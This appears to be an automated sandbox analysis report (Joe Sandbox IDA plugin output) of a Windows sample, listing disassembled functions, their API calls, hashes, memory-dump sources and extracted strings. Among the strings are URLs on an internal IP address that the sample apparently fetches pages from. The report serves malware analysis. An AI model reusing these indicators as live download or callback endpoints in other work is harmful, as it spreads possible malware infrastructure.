Opcode ID: 6b4598c18b149baf41dc2c699b37129104aff7cc0169a10aed1875957db3102f
Instruction ID: e12ff5c2053f9a72bd65041b051e88c030b435080f647bcd3e17c5c7067139df
Opcode Fuzzy Hash: 6b4598c18b149baf41dc2c699b37129104aff7cc0169a10aed1875957db3102f
Instruction Fuzzy Hash: EE31C8B5204341ABD305FB25D856F9FB7E4ABD8704F000A2EF595672C1DB7865088BA7

Function 004039D0 Relevance: 21.1, APIs: 14, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004039FC
6D7D56F0.MFC42 ref: 00403A08
6D7FBFA0.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A1E
6D7CEC00.MFC42(?,?,00000020,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00404BC8), ref: 00403A33

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 0040391E

6D7EB590.MFC42(?,00000000,00000000), ref: 00403A4C
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A5D
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A6B
6D7CEC00.MFC42(?,00000000,00000020,00000001,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A87

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 00403963

6D7CEC00.MFC42(?,?,00000020,00000001,?), ref: 00403AA7

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 00403986

6D7EB590.MFC42(?,00000001), ref: 00403ABF
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AD0
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403ADE
6D7EE820.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AE7
6D7CA420.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AF8

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$B590$E820MessageSend
String ID:
API String ID: 1276184048-0
Opcode ID: c4a9426b3d146f6b18e720923754d03eefbba986a6632d145798aab3bb1fd514
Instruction ID: f6de4c7b58c9e08d410c388df69f80ca665281aef36746c90f471116ae625215
Opcode Fuzzy Hash: c4a9426b3d146f6b18e720923754d03eefbba986a6632d145798aab3bb1fd514
Instruction Fuzzy Hash: A831A8B5204341AFC304EB25C856F9FB7E4ABD4714F004A2EF595662D1DB78A5088BA7

Function 00401830 Relevance: 19.6, APIs: 13, Instructions: 53COMMON

Download Yara Rule

APIs

6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040185B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040186B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040187B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040188B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040189B
6D7C2C80.MFC42(?,?,?,0040470F,000000FF), ref: 004018AB
6D7FBC50.MFC42(?,?,?,0040470F,000000FF), ref: 004018BB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018CB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018DB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018EB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018FB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 00401908
6D8003E0.MFC42(?,?,?,0040470F,000000FF), ref: 00401917

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$D8003
String ID:
API String ID: 3465068534-0
Opcode ID: 7b5ce37691534f6e46bec6ed38d29974445b5b0c433dc7e2899eb447151f42f4
Instruction ID: f9e30e69a48690507b3e4af920e781beb467eb0ec983ed3cc8e406cc6407e96c
Opcode Fuzzy Hash: 7b5ce37691534f6e46bec6ed38d29974445b5b0c433dc7e2899eb447151f42f4
Instruction Fuzzy Hash: 0F214C740087C18BD315EB74C05979BBBE4BFA9314F440E1EE5EA162C2DBB86248C6A7

Function 00401F00 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00401F23

Part of subcall function 00403F80: 6D809A60.MFC42(?,000000CB,00000002,00000009,00000000,00000000,?,00401F36), ref: 00403F92

_mbscmp.MSVCRT ref: 00401F73
6D7CA420.MFC42 ref: 00401F81
CoUninitialize.OLE32(http://192.168.100.83/,00000000,00000000,00000000,00000000), ref: 00402063

Strings

http://192.168.100.83/F.htm, xrefs: 00402007
http://192.168.100.83/, xrefs: 00401F6D, 00402057
http://192.168.100.83/9.htm, xrefs: 00402032

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420D809InitializeUninitialize_mbscmp
String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
API String ID: 3761695730-1795800369
Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96

Function 00401C60 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

6D800E90.MFC42(?,?,?,?,004047E8,000000FF), ref: 00401C7A
GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
6D809290.MFC42(00000000,?,?,?,?,004047E8,000000FF), ref: 00401C8C
6D7D56F0.MFC42(00000000,?,?,?,?,004047E8,000000FF), ref: 00401C9B
6D7C95D0.MFC42(00000065,00000000,?,?,?,?,004047E8,000000FF), ref: 00401CAE
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
6D7CA420.MFC42(00000065,00000000,?,?,?,?,004047E8,000000FF), ref: 00401CF0
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21

Strings

http://www.1.com, xrefs: 00401D31

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: Menu$AppendMessageSend$A420D800D809290System
String ID: http://www.1.com
API String ID: 3615546937-1471656216
Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59

Function 00403500 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

6D800310.MFC42(00000082,?,?,?,?,00000000,?,00404B39,000000FF,004025B6,00000000), ref: 00403529
6D7C7F20.MFC42(00000082,?), ref: 0040353B
6D7C7F20.MFC42(00000082,?), ref: 00403553
6D7C7F20.MFC42(00000082,?), ref: 0040356B
6D7C7F20.MFC42(00000082,?), ref: 00403583
6D7D56F0.MFC42(00000082,?), ref: 0040359B
6D7D56F0.MFC42(00000082,?), ref: 004035AD
6D7D5A80.MFC42(004073FC,00000082,?), ref: 004035C4
6D7D5A80.MFC42(004073FC,004073FC,00000082,?), ref: 004035D0

Strings

DB@, xrefs: 004035BE
nB@, xrefs: 00403540

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D800310
String ID: DB@$nB@
API String ID: 1386358564-4005678958
Opcode ID: d9b166e6bfa9c663b61ce0e3a603041949639b1d5f481a09527389042575c698
Instruction ID: 07a67f05f5cb526cde5bb56a1f38001e8bee0c3f8aa25bc8e26a66cad1eb58db
Opcode Fuzzy Hash: d9b166e6bfa9c663b61ce0e3a603041949639b1d5f481a09527389042575c698
Instruction Fuzzy Hash: 092118B1348B818BD301EF25844176FBBE1EBD5784F14486EF681273C2CBBD65098B9A

Function 00402590 Relevance: 12.0, APIs: 8, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00403500: 6D800310.MFC42(00000082,?,?,?,?,00000000,?,00404B39,000000FF,004025B6,00000000), ref: 00403529
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 0040353B
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 00403553
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 0040356B
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 00403583
Part of subcall function 00403500: 6D7D56F0.MFC42(00000082,?), ref: 0040359B
Part of subcall function 00403500: 6D7D56F0.MFC42(00000082,?), ref: 004035AD
Part of subcall function 00403500: 6D7D5A80.MFC42(004073FC,00000082,?), ref: 004035C4
Part of subcall function 00403500: 6D7D5A80.MFC42(004073FC,004073FC,00000082,?), ref: 004035D0

6D8009F0.MFC42 ref: 004025C5
6D7CA420.MFC42 ref: 004025DC
6D7CA420.MFC42 ref: 004025F0
6D7FBC00.MFC42 ref: 00402604
6D7FBC00.MFC42 ref: 00402618
6D7FBC00.MFC42 ref: 0040262C
6D7FBC50.MFC42 ref: 0040263D
6D8003E0.MFC42 ref: 00402651

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$D8003D800310D8009
String ID:
API String ID: 1126660788-0
Opcode ID: e526fec369c35d35e31d161f3d6166b5031a0c0aa420842dfd615be23e30ada1
Instruction ID: 42c3b9d168d0418a94f95c23e9adf838e90ef7772fbddf989849af9f639a5948
Opcode Fuzzy Hash: e526fec369c35d35e31d161f3d6166b5031a0c0aa420842dfd615be23e30ada1
Instruction Fuzzy Hash: A611067400C3C0DAD336EB60C459BDBBBB4BBE9314F800A2DA59D162C19F781149CA57

Function 00402670 Relevance: 10.5, APIs: 7, Instructions: 35COMMON

Download Yara Rule

APIs

6D7CA420.MFC42(?,?,?,0040498B,000000FF), ref: 0040269B
6D7CA420.MFC42(?,?,?,0040498B,000000FF), ref: 004026AB
6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026BB
6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026CB
6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026DB
6D7FBC50.MFC42(?,?,?,0040498B,000000FF), ref: 004026E8
6D8003E0.MFC42(?,?,?,0040498B,000000FF), ref: 004026F7

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$D8003
String ID:
API String ID: 3465068534-0
Opcode ID: 73797ba87a622be385d98e4536f12e1290190033833ce099e9855b6aedb849fc
Instruction ID: d16fc65b1ff759d4bf2d112fd190ecce01b2d07838592e1474cafa958000d974
Opcode Fuzzy Hash: 73797ba87a622be385d98e4536f12e1290190033833ce099e9855b6aedb849fc
Instruction Fuzzy Hash: 320140B00087C19BD315EB25C40979BBBE4BBE9714F440E1EF5E6162C1CBB85648C696

Function 00401BE0 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

6D8014C0.MFC42(?,000003F5,?), ref: 00401BF3
6D8014C0.MFC42(?,000003EE,?,?,000003F5,?), ref: 00401C05
6D8014C0.MFC42(?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C17
6D801960.MFC42(?,000003EF,?,?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C29
6D801140.MFC42(?,?,0000000A,?,000003EF,?,?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C32
6D801960.MFC42(?,000003F0,?,?,?,0000000A,?,000003EF,?,?,000003E8,?,?,000003EE,?,?), ref: 00401C44

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D8014$D801960$D801140
String ID:
API String ID: 3703784044-0
Opcode ID: cfde83c47ff25b013f24b5fb9812b7ebe0be881af1d191fad1845931f096e49f
Instruction ID: 93ee3fe985d7ce76ed5cd37f38fdc4d041633a02a5185305ce90021903040c5d
Opcode Fuzzy Hash: cfde83c47ff25b013f24b5fb9812b7ebe0be881af1d191fad1845931f096e49f
Instruction Fuzzy Hash: 6CF0BEB27902143BE202A651DCC2EBF626CEBD6B9AF01037EF700360C19AAC2A014275

Function 00403610 Relevance: 9.0, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

6D8014C0.MFC42(?,000003EE,?), ref: 00403622
6D8014C0.MFC42(?,000003FB,?,?,000003EE,?), ref: 00403634
6D8014C0.MFC42(?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 00403646
6D8014C0.MFC42(?,000003F3,?,?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 00403658
6D801960.MFC42(?,000003EF,?,?,000003F3,?,?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 0040366A
6D801960.MFC42(?,000003F0,?,?,000003EF,?,?,000003F3,?,?,000003F4,?,?,000003FB,?,?), ref: 0040367C

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D8014$D801960
String ID:
API String ID: 4101713411-0
Opcode ID: b5ef06bcced9b5675932e51068800d4f328651a0de4a6e600310cf605433ae4f
Instruction ID: 7d7aa8acedc914c8f7f252d341010923b6cabf8a586bbe7ebd9ee2e302cdfebb
Opcode Fuzzy Hash: b5ef06bcced9b5675932e51068800d4f328651a0de4a6e600310cf605433ae4f
Instruction Fuzzy Hash: 08F0BEB26902153BE202A621DC82FFF636CEBC5B44F05473EB785760C19FBC2A018325

Function 00402F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorystringCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00402F09
lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
SysAllocString.OLEAUT32(00000000), ref: 00402F5F

Strings

NULL, xrefs: 00402F05

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: AllocByteCharClearMultiStringVariantWidelstrlen
String ID: NULL
API String ID: 3257503732-324932091
Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9

Function 004010C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004010D9
srand.MSVCRT ref: 004010E0
rand.MSVCRT ref: 004010EF
rand.MSVCRT ref: 00401110

Strings

ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: rand$CountTicksrand
String ID: ekimhuqcroanflvzgdjtxypswb
API String ID: 3923125369-3762667353
Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA

Function 00403060 Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004030F1
VariantClear.OLEAUT32(?), ref: 0040318F
VariantClear.OLEAUT32(?), ref: 0040319B
SysFreeString.OLEAUT32(?), ref: 0040323E

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: ClearFreeStringVariant
String ID:
API String ID: 1438600931-0
Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56

Function 00402850 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040286D

Part of subcall function 00403F80: 6D809A60.MFC42(?,000000CB,00000002,00000009,00000000,00000000,?,00401F36), ref: 00403F92

6D7CEC00.MFC42(?), ref: 004028AF
6D7CEC00.MFC42 ref: 004028C7
CoUninitialize.OLE32 ref: 004028E3

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
